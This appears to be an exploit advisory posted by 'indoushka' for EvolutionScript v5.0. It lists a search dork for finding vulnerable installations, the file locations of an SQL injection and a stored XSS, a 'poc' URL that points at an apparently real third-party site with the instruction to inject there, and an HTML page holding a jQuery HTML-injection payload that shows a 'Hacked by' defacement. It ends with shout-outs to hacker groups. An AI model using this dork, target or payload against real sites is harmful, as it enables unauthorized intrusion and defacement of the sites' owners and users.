evolutionscript v5.0 Mullti Vulnerability
=========================================
Author : indoushka
Vondor : http://EvolutionScript.com
Dork   : Powered by EvolutionScript Version 5.0 Copyright © 2010 - 2015 EvolutionScript.com
=========================
Sql injection :

C:\AppServ\www\EvolutionScript\includes\init.php
Line 145
mysqli::query
$todayis,$user_info['id']

poc: http://www.twickerz.com/bannerclick.php?id=15806 (inject her)

Xss :

C:\AppServ\www\EvolutionScript\includes\functions.php
Line 154
echo
$stored

XSS ( HTML Inject ) - jQuery v1.8.2 :

save the code in name.html and open it

<html>
<head>
  <meta charset="utf-8">
  <title>XSS ( HTML Inject ) - jQuery v1.8.2 </title>
  <script src="http://127.0.0.1/EvolutionScript/js/jquery.min.js"></script>

  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
 
 
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee></script></option>
      </select>
    </p>
  </form>
</body>
</html>


Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be 
---------------------------------------------------------------------------------------------------------------